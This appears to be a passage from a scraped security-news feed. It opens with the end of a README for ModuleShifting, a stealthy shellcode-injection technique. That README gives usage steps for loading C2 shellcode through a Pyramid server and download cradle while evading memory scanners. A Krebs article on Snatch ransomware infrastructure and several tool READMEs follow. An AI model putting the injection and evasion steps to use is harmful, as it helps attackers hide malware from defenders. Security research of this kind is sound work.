  2. Shellcode execution using function pointer. This helps in avoid a new thread creation or calling unusual function callbacks.
  3. restoring of original dll content over the executed shellcode. This is a key difference.

The differences between Module Shifting and Module Overloading are the following:

  1. The PE can be written starting from a specified section instead of starting from the PE of the hosting dll. Once the target section is chosen carefully, this can reduce the amount of IoCs generated (i.e. PE header of the hosting dll is not overwritten or less bytes overwritten on .text section etc.)
  2. Padding that can be added to the PE payload itself to better blend into false positives.

Using a functionally independent shellcode payload such as an AceLdr Beacon Stageless shellcode payload, ModuleShifting is able to locally inject without dynamically allocating memory and at the moment generating zero IoC on a Moneta and PE-Sieve scan. I am aware that the AceLdr sleeping payloads can be caught with other great tools such as Hunt-Sleeping-Beacon, but the focus here is on the injection technique itself, not on the payload. In our case what is enabling more stealthiness in the injection is the shellcode functional independence, so that the written malicious bytes can be restored to its original content, effectively erasing the traces of the injection.

Disclaimer

All information and content is provided for educational purposes only. Follow instructions at your own risk. Neither the author nor his employer are responsible for any direct or consequential damage or loss arising from any person or organization.

Credits

This work has been made possible because of the knowledge and tools shared by incredible people like Aleksandra Doniec @hasherezade, Forest Orr and Kyle Avery. I heavily used Moneta, PeSieve, PE-Bear and AceLdr throughout all my learning process and they have been key for my understanding of this topic.

Usage

ModuleShifting can be used with Pyramid and a Python interpreter to execute the local process injection fully in-memory, avoiding compiled loaders.

  1. Clone the Pyramid repo:

git clone https://github.com/naksyn/Pyramid

  1. Generate a shellcode payload with your preferred C2 and drop it into Pyramid Delivery_files folder. See Caveats section for payload requirements.
  2. modify the parameters of moduleshifting.py script inside Pyramid Modules folder.
  3. Start the Pyramid server: python3 pyramid.py -u testuser -pass testpass -p 443 -enc chacha20 -passenc superpass -generate -server 192.168.1.2 -setcradle moduleshifting.py
  4. execute the generated cradle code on a python interpreter.

Caveats

To successfully execute this technique you should use a shellcode payload that is capable of loading an additional self-sustainable payload in another area of memory. ModuleShifting has been tested with AceLdr payload, which is capable of loading an entire copy of Beacon on the heap, so breaking the functional dependency with the initial shellcode. This technique would work with any shellcode payload that has similar capabilities. So the initial shellcode becomes useless once executed and there's no reason to keep it in memory as an IoC.

A hosting dll with enough space for the shellcode on the targeted section should also be chosen, otherwise the technique will fail.

Detection opportunities

Module Stomping and Module Shifting need to write shellcode on a legitimate dll memory space. ModuleShifting will eliminate this IoC after the cleanup phase but indicators could be spotted by scanners with realtime inspection capabilities.



‘Snatch’ Ransom Group Exposes Visitor IP Addresses

The victim shaming site operated by the Snatch ransomware group is leaking data about its true online location and internal operations, as well as the Internet addresses of its visitors, KrebsOnSecurity has found. The leaked data suggest that Snatch is one of several ransomware groups using paid ads on Google.com to trick people into installing malware disguised as popular free software, such as Microsoft Teams, Adobe Reader, Mozilla Thunderbird, and Discord.

First spotted in 2018, the Snatch ransomware group has published data stolen from hundreds of organizations that refused to pay a ransom demand. Snatch publishes its stolen data at a website on the open Internet, and that content is mirrored on the Snatch team’s darknet site, which is only reachable using the global anonymity network Tor.

The victim shaming website for the Snatch ransomware gang.

KrebsOnSecurity has learned that Snatch’s darknet site exposes its “server status” page, which includes information about the true Internet addresses of users accessing the website.

Refreshing this page every few seconds shows that the Snatch darknet site generates a decent amount of traffic, often attracting thousands of visitors each day. But by far the most frequent repeat visitors are coming from Internet addresses in Russia that either currently host Snatch’s clear web domain names or recently did.

The Snatch ransomware gang’s victim shaming site on the darknet is leaking data about its visitors. This “server status” page says that Snatch’s website is on Central European Summer Time (CEST) and is powered by OpenSSL/1.1.1f, which is no longer supported by security updates.

Probably the most active Internet address accessing Snatch’s darknet site is 193.108.114[.]41, which is a server in Yekaterinburg, Russia that hosts several Snatch domains, including snatchteam[.]top, sntech2ch[.]top, dwhyj2[.]top and sn76930193ch[.]top. It could well be that this Internet address is showing up frequently because Snatch’s clear-web site features a toggle button at the top that lets visitors switch over to accessing the site via Tor.

Another Internet address that showed up frequently in the Snatch server status page was 194.168.175[.]226, currently assigned to Matrix Telekom in Russia. According to DomainTools.com, this address also hosts or else recently hosted the usual coterie of Snatch domains, as well as quite a few domains phishing known brands such as Amazon and Cashapp.

The Moscow Internet address 80.66.64[.]15 accessed the Snatch darknet site all day long, and that address also housed the appropriate Snatch clear-web domains. More interestingly, that address is home to multiple recent domains that appear confusingly similar to known software companies, including libreoff1ce[.]com and www-discord[.]com.

This is interesting because the phishing domains associated with the Snatch ransomware gang were all registered to the same Russian name — Mihail Kolesnikov, a name that is somewhat synonymous with recent phishing domains tied to malicious Google ads.

Kolesnikov could be a nod to a Russian general made famous during Boris Yeltsin’s reign. Either way, it’s clearly a pseudonym, but there are some other commonalities among these domains that may provide insight into how Snatch and other ransomware groups are sourcing their victims.

DomainTools says there are more than 1,300 current and former domain names registered to Mihail Kolesnikov between 2013 and July 2023. About half of the domains appear to be older websites advertising female escort services in major cities around the United States (e.g. the now-defunct pittsburghcitygirls[.]com).

The other half of the Kolesnikov websites are far more recent phishing domains mostly ending in “.top” and “.app” that appear designed to mimic the domains of major software companies, including www-citrix[.]top, www-microsofteams[.]top, www-fortinet[.]top, ibreoffice[.]top, www-docker[.]top, www-basecamp[.]top, ccleaner-cdn[.]top, adobeusa[.]top, and www.real-vnc[.]top.

In August 2023, researchers with Trustwave Spiderlabs said they encountered domains registered to Mihail Kolesnikov being used to disseminate the Rilide information stealer trojan.

But it appears multiple crime groups may be using these domains to phish people and disseminate all kinds of information-stealing malware. In February 2023, Spamhaus warned of a huge surge in malicious ads that were hijacking search results in Google.com, and being used to distribute at least five different families of information stealing trojans, including AuroraStealer, IcedID/Bokbot, Meta Stealer, RedLine Stealer and Vidar.

For example, Spamhaus said victims of these malicious ads would search for Microsoft Teams in Google.com, and the search engine would often return a paid ad spoofing Microsoft or Microsoft Teams as the first result — above all other results. The malicious ad would include a logo for Microsoft and at first glance appear to be a safe and trusted place to download the Microsoft Teams client.

However, anyone who clicked on the result was whisked away instead to mlcrosofteams-us[.]top — yet another malicious domain registered to Mr. Kolesnikov. And while visitors to this website may believe they are only downloading the Microsoft Teams client, the installer file includes a copy of the IcedID malware, which is really good at stealing passwords and authentication tokens from the victim’s web browser.

Image: Spamhaus

The founder of the Swiss anti-abuse website abuse.ch told Spamhaus it is likely that some cybercriminals have started to sell “malvertising as a service” on the dark web, and that there is a great deal of demand for this service.

In other words, someone appears to have built a very profitable business churning out and promoting new software-themed phishing domains and selling that as a service to other cybercriminals. Or perhaps they are simply selling any stolen data (and any corporate access) to active and hungry ransomware group affiliates.

The tip about the exposed “server status” page on the Snatch darkweb site came from @htmalgae, the same security researcher who alerted KrebsOnSecurity earlier this month that the darknet victim shaming site run by the 8Base ransomware gang was inadvertently left in development mode.

That oversight revealed not only the true Internet address of the hidden 8Base site (in Russia, naturally), but also the identity of a programmer in Moldova who apparently helped to develop the 8Base code.

@htmalgae said the idea of a ransomware group’s victim shaming site leaking data that they did not intend to expose is deliciously ironic.

“This is a criminal group that shames others for not protecting user data,” @htmalgae said. “And here they are leaking their user data.”

All of the malware mentioned in this story is designed to run on Microsoft Windows devices. But Malwarebytes recently covered the emergence of a Mac-based information stealer trojan called AtomicStealer that was being advertised through malicious Google ads and domains that were confusingly similar to software brands.

Please be extra careful when you are searching online for popular software titles. Cracked, pirated copies of major software titles are a frequent source of infostealer infections, as are these rogue ads masquerading as search results. Make sure to double-check you are actually at the domain you believe you’re visiting *before* you download and install anything.

Stay tuned for Part II of this post, which includes a closer look at the Snatch ransomware group and their founder.

Further reading:

@HTMalgae’s list of the top Internet addresses seen accessing Snatch’s darknet site

Ars Technica: Until Further Notice Think Twice Before Using Google to Download Software

Bleeping Computer: Hackers Abuse Google Ads to Spread Malware in Legit Software

Deepfaking it: What to know about deepfake-driven sextortion schemes

Criminals increasingly create deepfake nudes from people’s benign public photos in order to extort money from them, the FBI warns

Is a RAT stealing your files? – Week in security with Tony Anscombe

Could your Android phone be home to a remote access tool (RAT) that steals WhatsApp backups or performs other shenanigans?

KaliPackergeManager - Kali Packerge Manager

By: Zion3R


kalipm.sh is a powerful package management tool for Kali Linux that provides a user-friendly menu-based interface to simplify the installation of various packages and tools. It streamlines the process of managing software and enables users to effortlessly install packages from different categories. 


Features

  • Interactive Menu: Enjoy an intuitive and user-friendly menu-based interface for easy package selection.
  • Categorized Packages: Browse packages across multiple categories, including System, Desktop, Tools, Menu, and Others.
  • Efficient Installation: Automatically install selected packages with the help of the apt-get package manager.
  • System Updates: Keep your system up to date with the integrated update functionality.

Installation

To install KaliPm, you can simply clone the repository from GitHub:

git clone https://github.com/HalilDeniz/KaliPackergeManager.git

Usage

  1. Clone the repository or download the KaliPM.sh script.
  2. Navigate to the directory where the script is located.
  3. Make the script executable by running the following command:
    chmod +x kalipm.sh
  4. Execute the script using the following command:
    ./kalipm.sh
  5. Follow the on-screen instructions to select a category and choose the desired packages for installation.

Categories

  • System: Includes essential core items that are always included in the Kali Linux system.
  • Desktop: Offers various desktop environments and window managers to customize your Kali Linux experience.
  • Tools: Provides a wide range of specialized tools for tasks such as hardware hacking, cryptography, wireless protocols, and more.
  • Menu: Consists of packages tailored for information gathering, vulnerability assessments, web application attacks, and other specific purposes.
  • Others: Contains additional packages and resources that don't fall into the above categories.

Update

KaliPM.sh also includes an update feature to ensure your system is up to date. Simply select the "Update" option from the menu, and the script will run the necessary commands to clean, update, upgrade, and perform a full-upgrade on your system.

Contributing

Contributions are welcome! To contribute to KaliPackergeManager, follow these steps:

  1. Fork the repository.
  2. Create a new branch for your feature or bug fix.
  3. Make your changes and commit them.
  4. Push your changes to your forked repository.
  5. Open a pull request in the main repository.

Contact

If you have any questions, comments, or suggestions about Tool Name, please feel free to contact me:



Associated-Threat-Analyzer - Detects Malicious IPv4 Addresses And Domain Names Associated With Your Web Application Using Local Malicious Domain And IPv4 Lists

By: Zion3R


Associated-Threat-Analyzer detects malicious IPv4 addresses and domain names associated with your web application using local malicious domain and IPv4 lists.


Installation

From Git

git clone https://github.com/OsmanKandemir/associated-threat-analyzer.git
cd associated-threat-analyzer && pip3 install -r requirements.txt
python3 analyzer.py -d target-web.com

From Dockerfile

You can run this application on a container after build a Dockerfile.

Warning : If you want to run a Docker container, associated threat analyzer recommends to use your malicious IPs and domains lists, because maintainer may not be update a default malicious IP and domain lists on docker image.
docker build -t osmankandemir/threatanalyzer .
docker run osmankandemir/threatanalyzer -d target-web.com

From DockerHub

docker pull osmankandemir/threatanalyzer
docker run osmankandemir/threatanalyzer -d target-web.com

Usage

-d DOMAIN , --domain DOMAIN Input Target. --domain target-web1.com
-t DOMAINSFILE, --DomainsFile Malicious Domains List to Compare. -t SampleMaliciousDomains.txt
-i IPSFILE, --IPsFile Malicious IPs List to Compare. -i SampleMaliciousIPs.txt
-o JSON, --json JSON JSON output. --json

DONE

  • First-level depth scan your domain address.

TODO list

  • Third-level or the more depth static files scanning for target web application.
Other linked github project. You can take a look.
Finds related domains and IPv4 addresses to do threat intelligence after Indicator-Intelligence v1.1.1 collects static files

https://github.com/OsmanKandemir/indicator-intelligence

Default Malicious IPs and Domains Sources

https://github.com/stamparm/blackbook

https://github.com/stamparm/ipsum

Development and Contribution

See; CONTRIBUTING.md



Tiny_Tracer - A Pin Tool For Tracing API Calls Etc

By: Zion3R


A Pin Tool for tracing:


Bypasses the anti-tracing check based on RDTSC.

Generates a report in a .tag format (which can be loaded into other analysis tools):

RVA;traced event

i.e.

345c2;section: .text
58069;called: C:\Windows\SysWOW64\kernel32.dll.IsProcessorFeaturePresent
3976d;called: C:\Windows\SysWOW64\kernel32.dll.LoadLibraryExW
3983c;called: C:\Windows\SysWOW64\kernel32.dll.GetProcAddress
3999d;called: C:\Windows\SysWOW64\KernelBase.dll.InitializeCriticalSectionEx
398ac;called: C:\Windows\SysWOW64\KernelBase.dll.FlsAlloc
3995d;called: C:\Windows\SysWOW64\KernelBase.dll.FlsSetValue
49275;called: C:\Windows\SysWOW64\kernel32.dll.LoadLibraryExW
4934b;called: C:\Windows\SysWOW64\kernel32.dll.GetProcAddress
...

How to build

On Windows

To compile the prepared project you need to use Visual Studio >= 2012. It was tested with Intel Pin 3.28.
Clone this repo into \source\tools that is inside your Pin root directory. Open the project in Visual Studio and build. Detailed description available here.
To build with Intel Pin < 3.26 on Windows, use the appropriate legacy Visual Studio project.

On Linux

For now the support for Linux is experimental. Yet it is possible to build and use Tiny Tracer on Linux as well. Please refer tiny_runner.sh for more information. Detailed description available here.

Usage

 Details about the usage you will find on the project's Wiki.

WARNINGS

  • In order for Pin to work correctly, Kernel Debugging must be DISABLED.
  • In install32_64 you can find a utility that checks if Kernel Debugger is disabled (kdb_check.exe, source), and it is used by the Tiny Tracer's .bat scripts. This utilty sometimes gets flagged as a malware by Windows Defender (it is a known false positive). If you encounter this issue, you may need to exclude the installation directory from Windows Defender scans.
  • Since the version 3.20 Pin has dropped a support for old versions of Windows. If you need to use the tool on Windows < 8, try to compile it with Pin 3.19.


Questions? Ideas? Join Discussions!



❌